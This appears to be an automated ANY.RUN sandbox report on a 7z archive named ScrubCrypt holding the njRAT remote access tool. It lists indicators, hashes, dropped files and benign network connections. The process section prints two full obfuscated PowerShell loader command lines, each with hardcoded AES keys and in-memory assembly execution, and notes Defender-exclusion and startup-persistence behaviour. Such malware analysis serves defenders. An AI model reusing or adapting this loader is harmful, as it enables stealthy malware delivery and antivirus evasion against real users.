File name:

ScrubCrypt.7z

Full analysis: https://app.any.run/tasks/68792190-d866-45bb-92b7-047776119a16
Verdict: Malicious activity
Analysis date: July 22, 2024, 14:28:12
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: application/x-7z-compressed
File info: 7-zip archive data, version 0.4
MD5:

5289C2DFD85FB4D70920800911AD6D34

SHA1:

01F83121A73A273078C08965B187F770185ADCD2

SHA256:

5A0A1CC4FD8B1546802BA73840846339D0D435DD3CF4A61D774F3D67FE8BB424

SSDEEP:

98304:1pAooP4hpMFvGEbh2dl/+NjutDr1sUmsJUcrA5NbNTAi3ZTW9iM2RgD1dIgxFOfJ:1W+LFXdU8Cy9vGn1Y0CaeA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • njRAT v0.7d.exe (PID: 7684)
      • ilasm.exe (PID: 7636)
      • csc.exe (PID: 4712)
      • csc.exe (PID: 1328)

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 1764)
      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 6640)
      • powershell.exe (PID: 1340)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4596)
      • powershell.exe (PID: 752)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 8124)

    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 1764)
      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 6640)
      • powershell.exe (PID: 1340)

    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 1764)
      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 6640)
      • powershell.exe (PID: 1340)

    • Adds process to the Windows Defender exclusion list

      • powershell.exe (PID: 1764)

    • Create files in the Startup directory

      • powershell.exe (PID: 7676)

  • SUSPICIOUS

    • There is functionality for taking screenshot (YARA)

      • ScrubCrypt.exe (PID: 5344)

    • Reads Internet Explorer settings

      • njRAT v0.7d.exe (PID: 7684)

    • Reads security settings of Internet Explorer

      • njRAT v0.7d.exe (PID: 7684)
      • ScrubCrypt.exe (PID: 5344)

    • Reads the date of Windows installation

      • njRAT v0.7d.exe (PID: 7684)

    • Executable content was dropped or overwritten

      • ilasm.exe (PID: 7636)
      • njRAT v0.7d.exe (PID: 7684)
      • csc.exe (PID: 4712)
      • csc.exe (PID: 1328)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 7380)
      • cmd.exe (PID: 4752)
      • cmd.exe (PID: 3172)
      • cmd.exe (PID: 7484)
      • powershell.exe (PID: 7676)
      • cmd.exe (PID: 4260)
      • cmd.exe (PID: 5156)
      • cmd.exe (PID: 7672)
      • cmd.exe (PID: 6524)

    • Application launched itself

      • cmd.exe (PID: 4752)
      • powershell.exe (PID: 1764)
      • cmd.exe (PID: 7380)
      • cmd.exe (PID: 3172)
      • cmd.exe (PID: 7484)
      • powershell.exe (PID: 7676)
      • cmd.exe (PID: 4260)
      • cmd.exe (PID: 5156)
      • powershell.exe (PID: 6640)
      • cmd.exe (PID: 6524)
      • cmd.exe (PID: 7672)
      • powershell.exe (PID: 1340)

    • Cryptography encrypted command line is found

      • cmd.exe (PID: 1340)
      • cmd.exe (PID: 1140)
      • cmd.exe (PID: 8060)
      • cmd.exe (PID: 6216)

    • Executing commands from ".cmd" file

      • cmd.exe (PID: 4752)
      • cmd.exe (PID: 7380)
      • cmd.exe (PID: 3172)
      • cmd.exe (PID: 7484)
      • powershell.exe (PID: 7676)
      • cmd.exe (PID: 4260)
      • cmd.exe (PID: 5156)
      • cmd.exe (PID: 7672)
      • cmd.exe (PID: 6524)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 4752)
      • powershell.exe (PID: 1764)
      • powershell.exe (PID: 7676)
      • cmd.exe (PID: 7484)
      • cmd.exe (PID: 5156)
      • powershell.exe (PID: 6640)
      • cmd.exe (PID: 7672)
      • powershell.exe (PID: 1340)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1764)
      • powershell.exe (PID: 3152)
      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 6640)
      • powershell.exe (PID: 1340)

    • Script adds exclusion process to Windows Defender

      • powershell.exe (PID: 1764)

    • Script adds exclusion path to Windows Defender

      • powershell.exe (PID: 1764)

  • INFO

    • Checks supported languages

      • ScrubCrypt.exe (PID: 5344)
      • njRAT v0.7d.exe (PID: 7684)
      • ilasm.exe (PID: 7636)
      • csc.exe (PID: 4712)
      • cvtres.exe (PID: 5772)
      • csc.exe (PID: 1328)
      • cvtres.exe (PID: 5492)

    • Manual execution by a user

      • ScrubCrypt.exe (PID: 5344)
      • WinRAR.exe (PID: 6668)
      • njRAT v0.7d.exe (PID: 7684)
      • cmd.exe (PID: 7380)
      • cmd.exe (PID: 3172)
      • Taskmgr.exe (PID: 6500)
      • Taskmgr.exe (PID: 2020)
      • cmd.exe (PID: 6524)

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 2768)
      • WinRAR.exe (PID: 6668)

    • Drops the executable file immediately after the start

      • WinRAR.exe (PID: 2768)
      • WinRAR.exe (PID: 6668)

    • Reads the computer name

      • ScrubCrypt.exe (PID: 5344)
      • njRAT v0.7d.exe (PID: 7684)

    • Reads the machine GUID from the registry

      • ScrubCrypt.exe (PID: 5344)
      • njRAT v0.7d.exe (PID: 7684)
      • csc.exe (PID: 4712)
      • csc.exe (PID: 1328)

    • Checks proxy server information

      • slui.exe (PID: 2252)

    • Reads the software policy settings

      • slui.exe (PID: 2252)

    • Reads Environment values

      • njRAT v0.7d.exe (PID: 7684)

    • Create files in a temporary directory

      • njRAT v0.7d.exe (PID: 7684)
      • ScrubCrypt.exe (PID: 5344)
      • cvtres.exe (PID: 5772)
      • cvtres.exe (PID: 5492)

    • Process checks computer location settings

      • njRAT v0.7d.exe (PID: 7684)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 1764)
      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 6640)
      • powershell.exe (PID: 1340)

    • Checks current location (POWERSHELL)

      • powershell.exe (PID: 1764)
      • powershell.exe (PID: 4596)
      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 752)
      • powershell.exe (PID: 6640)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 1340)
      • powershell.exe (PID: 8124)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 1764)
      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 6640)
      • powershell.exe (PID: 1340)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1764)
      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 6640)
      • powershell.exe (PID: 1340)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6840)
      • powershell.exe (PID: 1764)
      • powershell.exe (PID: 6640)
      • powershell.exe (PID: 1340)

    • Reads security settings of Internet Explorer

      • Taskmgr.exe (PID: 2020)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.7z | 7-Zip compressed archive (v0.4) (57.1)
.7z | 7-Zip compressed archive (gen) (42.8)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
200
Monitored processes
55
Malicious processes
13
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe slui.exe THREAT scrubcrypt.exe no specs winrar.exe rundll32.exe no specs njrat v0.7d.exe ilasm.exe conhost.exe no specs csc.exe conhost.exe no specs cvtres.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs csc.exe conhost.exe no specs cvtres.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe powershell.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe no specs powershell.exe no specs taskmgr.exe no specs taskmgr.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
752"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
1020\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1140C:\WINDOWS\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\admin\Desktop\njRAT v0.7d\njRAT v0.7d\Server_SXXC.cmd';$UxKi='TTVTnrTVTnansTVTnforTVTnmTVTnFiTVTnnTVTnalBTVTnloTVTncTVTnkTVTn'.Replace('TVTn', ''),'MiZCUaiZCUiniZCUMoiZCUduliZCUeiZCU'.Replace('iZCU', ''),'ElGQzbemGQzbenGQzbtGQzbAtGQzb'.Replace('GQzb', ''),'CreHGQeaHGQetHGQeeHGQeDeHGQecrHGQeypHGQetoHGQerHGQe'.Replace('HGQe', ''),'LoKWwMadKWwM'.Replace('KWwM', ''),'CYzxbopYzxbyYzxbToYzxb'.Replace('Yzxb', ''),'ReaDIuZdDIuZLiDIuZnDIuZesDIuZ'.Replace('DIuZ', ''),'FAiprroAiprmAiprBAipraseAipr64AiprStAiprrinAiprgAipr'.Replace('Aipr', ''),'IgyJNngyJNvgyJNogyJNkegyJN'.Replace('gyJN', ''),'EnCLSMtrCLSMyPCLSMoiCLSMntCLSM'.Replace('CLSM', ''),'CNnwDhaNnwDnNnwDgNnwDeENnwDxtNnwDenNnwDsNnwDioNnwDnNnwD'.Replace('NnwD', ''),'SpGKVSliGKVStGKVS'.Replace('GKVS', ''),'GfDNNetfDNNCufDNNrrefDNNntfDNNPrfDNNocfDNNesfDNNsfDNN'.Replace('fDNN', ''),'Decwjveompwjverewjveswjveswjve'.Replace('wjve', '');powershell -w hidden;function EpSVk($tYQgf){$UxBrE=[System.Security.Cryptography.Aes]::Create();$UxBrE.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UxBrE.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UxBrE.Key=[System.Convert]::($UxKi[7])('/eCeRu2Hg7r6jweOGBLshbngw8x4F8fQNYqdqYE7pNE=');$UxBrE.IV=[System.Convert]::($UxKi[7])('aCcn1qm9HyHF3ijahVI6NA==');$MHxlr=$UxBrE.($UxKi[3])();$DhcUO=$MHxlr.($UxKi[0])($tYQgf,0,$tYQgf.Length);$MHxlr.Dispose();$UxBrE.Dispose();$DhcUO;}function BioKz($tYQgf){$kXizG=New-Object System.IO.MemoryStream(,$tYQgf);$ugtVE=New-Object System.IO.MemoryStream;$fsQtE=New-Object System.IO.Compression.GZipStream($kXizG,[IO.Compression.CompressionMode]::($UxKi[13]));$fsQtE.($UxKi[5])($ugtVE);$fsQtE.Dispose();$kXizG.Dispose();$ugtVE.Dispose();$ugtVE.ToArray();}$UpxwY=[System.IO.File]::($UxKi[6])([Console]::Title);$zmYje=BioKz (EpSVk ([Convert]::($UxKi[7])([System.Linq.Enumerable]::($UxKi[2])($UpxwY, 5).Substring(2))));$kiyWI=BioKz (EpSVk ([Convert]::($UxKi[7])([System.Linq.Enumerable]::($UxKi[2])($UpxwY, 6).Substring(2))));[System.Reflection.Assembly]::($UxKi[4])([byte[]]$kiyWI).($UxKi[9]).($UxKi[8])($null,$null);[System.Reflection.Assembly]::($UxKi[4])([byte[]]$zmYje).($UxKi[9]).($UxKi[8])($null,$null); "C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
1144\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1328"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\w2wwgbj2.cmdline"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
ScrubCrypt.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
1340C:\WINDOWS\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\admin\Desktop\njRAT v0.7d\njRAT v0.7d\Server_SC.cmd';$klnF='SpfxlAlfxlAifxlAtfxlA'.Replace('fxlA', ''),'EKpECntKpECryKpECPoKpECinKpECtKpEC'.Replace('KpEC', ''),'DPetZePetZcomPetZprePetZssPetZ'.Replace('PetZ', ''),'LoJOssaJOssdJOss'.Replace('JOss', ''),'GeWsbxtCWsbxurWsbxreWsbxntWsbxProWsbxceWsbxssWsbx'.Replace('Wsbx', ''),'CrhLnPehLnPahLnPteDhLnPechLnPrhLnPyphLnPtohLnPrhLnP'.Replace('hLnP', ''),'InfqTnvfqTnokfqTnefqTn'.Replace('fqTn', ''),'FrEmJgomEmJgBEmJgasEmJge6EmJg4SEmJgtrEmJgiEmJgnEmJggEmJg'.Replace('EmJg', ''),'CXMsvhXMsvangXMsveEXMsvxteXMsvnsXMsvioXMsvnXMsv'.Replace('XMsv', ''),'EluujtemuujtentuujtAtuujt'.Replace('uujt', ''),'TZIzSrZIzSanZIzSsZIzSforZIzSmZIzSFZIzSinZIzSalZIzSBlZIzSocZIzSkZIzS'.Replace('ZIzS', ''),'COsRHopyOsRHToOsRH'.Replace('OsRH', ''),'MaRIklinMRIkloRIkldRIkluleRIkl'.Replace('RIkl', ''),'ReaEWmgdEWmgLEWmginEWmgeEWmgsEWmg'.Replace('EWmg', '');powershell -w hidden;function GvpSp($JYuwL){$zBGTF=[System.Security.Cryptography.Aes]::Create();$zBGTF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$zBGTF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$zBGTF.Key=[System.Convert]::($klnF[7])('6LP/emNB7n6J6zpOZtBYZwbqyO3vWwOlZvRPO8sAKXc=');$zBGTF.IV=[System.Convert]::($klnF[7])('hVuTeRs9QDMWTb9lUBTBvQ==');$hFoOX=$zBGTF.($klnF[5])();$kpCCC=$hFoOX.($klnF[10])($JYuwL,0,$JYuwL.Length);$hFoOX.Dispose();$zBGTF.Dispose();$kpCCC;}function QrXAX($JYuwL){$DCsre=New-Object System.IO.MemoryStream(,$JYuwL);$APvYM=New-Object System.IO.MemoryStream;$YosJQ=New-Object System.IO.Compression.GZipStream($DCsre,[IO.Compression.CompressionMode]::($klnF[2]));$YosJQ.($klnF[11])($APvYM);$YosJQ.Dispose();$DCsre.Dispose();$APvYM.Dispose();$APvYM.ToArray();}$kAsOw=[System.IO.File]::($klnF[13])([Console]::Title);$jwcXA=QrXAX (GvpSp ([Convert]::($klnF[7])([System.Linq.Enumerable]::($klnF[9])($kAsOw, 5).Substring(2))));$pPeYO=QrXAX (GvpSp ([Convert]::($klnF[7])([System.Linq.Enumerable]::($klnF[9])($kAsOw, 6).Substring(2))));[System.Reflection.Assembly]::($klnF[3])([byte[]]$pPeYO).($klnF[1]).($klnF[6])($null,$null);[System.Reflection.Assembly]::($klnF[3])([byte[]]$jwcXA).($klnF[1]).($klnF[6])($null,$null); "C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
1340C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
1764C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
1936"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
2020"C:\WINDOWS\system32\taskmgr.exe" /4C:\Windows\System32\Taskmgr.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Manager
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\taskmgr.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\combase.dll
Total events
91 386
Read events
91 005
Write events
352
Delete events
29

Modification events

(PID) Process:(2768) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(2768) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(2768) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\GoogleChromeEnterpriseBundle64.zip
(PID) Process:(2768) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\ScrubCrypt.7z
(PID) Process:(2768) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(2768) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(2768) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(2768) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(2768) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface
Operation:writeName:ShowPassword
Value:
1
(PID) Process:(6668) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
Executable files
14
Suspicious files
7
Text files
36
Unknown types
2

Dropped files

PID
Process
Filename
Type
6668WinRAR.exeC:\Users\admin\Desktop\njRAT v0.7d\njRAT v0.7d\Plugin\ch.dllexecutable
MD5:E747FA3339C1F138B6BFCE707B541D03
SHA256:6E31148CC1B3235B71731C3944A7B06F861E104E978708D12C695EC09B5B3760
6668WinRAR.exeC:\Users\admin\Desktop\njRAT v0.7d\njRAT v0.7d\GeoIP.datbinary
MD5:797B96CC417D0CDE72E5C25D0898E95E
SHA256:8A0675001B5BC63D8389FC7ED80B4A7B0F9538C744350F00162533519E106426
6668WinRAR.exeC:\Users\admin\Desktop\njRAT v0.7d\njRAT v0.7d\njRAT v0.7d.exeexecutable
MD5:473E1A7BE89C3A727176D4F9F5A64B69
SHA256:BF853789B938BDC5DA8AAEB52511379A332C7CF238266A21BFCB0318A62E85CB
6668WinRAR.exeC:\Users\admin\Desktop\njRAT v0.7d\njRAT v0.7d\Plugin\cam.dllexecutable
MD5:A73EDB60B80A2DFA86735D821BEA7B19
SHA256:7A4977B024D048B71BCC8F1CC65FB06E4353821323F852DC6740B79B9AB75C98
7684njRAT v0.7d.exeC:\Users\admin\AppData\Local\Temp\stub.iltext
MD5:C8655C84D00384BEF97D8ACFE726B849
SHA256:FC67A18AA79FE464A500462532E564EE10B5C62D1199AB509C190D2963E065DF
7636ilasm.exeC:\Users\admin\Desktop\njRAT v0.7d\njRAT v0.7d\Server.pdbbinary
MD5:435C1802EBB4AEFE8BB8DE52E419AB0A
SHA256:B72B378FFDDDC3DB14F5134256BAF3D58F2CA90D3222F1C73D0E85C9DEAC9DC7
6668WinRAR.exeC:\Users\admin\Desktop\njRAT v0.7d\njRAT v0.7d\Plugin\plg.dllexecutable
MD5:0CBC2D9703FEEAD9783439E551C2B673
SHA256:EA9ECF8723788FEEF6492BF938CDFAB1266A1558DFFE75E1F78A998320F96E39
6668WinRAR.exeC:\Users\admin\Desktop\njRAT v0.7d\njRAT v0.7d\WinMM.Net.dllexecutable
MD5:D4B80052C7B4093E10CE1F40CE74F707
SHA256:59E2AC1B79840274BDFCEF412A10058654E42F4285D732D1487E65E60FFBFB46
6668WinRAR.exeC:\Users\admin\Desktop\njRAT v0.7d\njRAT v0.7d\stub.iltext
MD5:2041E64BFFCCFBC9379235FDF294F188
SHA256:DAA4362A762A472F717A480102883382B41DC5C17484F649272C5BDB5142917C
7636ilasm.exeC:\Users\admin\Desktop\njRAT v0.7d\njRAT v0.7d\Server.exeexecutable
MD5:24303279C15BDC116AB71D0FE65DABBC
SHA256:B3CA240B43987EAC8510071846F37CB5D07E20A7251BAE08DBC180164F0AE933
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
31
DNS requests
15
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4.209.32.198:443
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
239.255.255.250:1900
whitelisted
40.115.3.253:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2760
svchost.exe
40.115.3.253:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4716
svchost.exe
40.126.32.72:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
5620
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
5620
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
7396
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.184.206
whitelisted
client.wns.windows.com
  • 40.115.3.253
whitelisted
login.live.com
  • 40.126.32.72
  • 40.126.32.133
  • 20.190.160.20
  • 40.126.32.68
  • 40.126.32.134
  • 40.126.32.138
  • 40.126.32.140
  • 40.126.32.76
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
  • 4.231.128.59
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted
arc.msn.com
  • 20.199.58.43
whitelisted
fd.api.iris.microsoft.com
  • 20.31.169.57
whitelisted
slscr.update.microsoft.com
  • 40.68.123.157
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted
www.bing.com
  • 2.23.209.130
  • 2.23.209.186
  • 2.23.209.185
  • 2.23.209.188
  • 2.23.209.192
  • 2.23.209.191
  • 2.23.209.189
  • 2.23.209.132
  • 2.23.209.183
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
ScrubCrypt.7z